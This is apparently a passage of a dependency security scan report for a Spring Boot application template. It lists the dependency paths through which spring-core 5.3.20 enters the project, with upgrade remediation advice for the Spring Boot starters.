  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.hateoas:spring-hateoas@1.5.1 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework:spring-context-support@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework:spring-webmvc@5.3.22 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
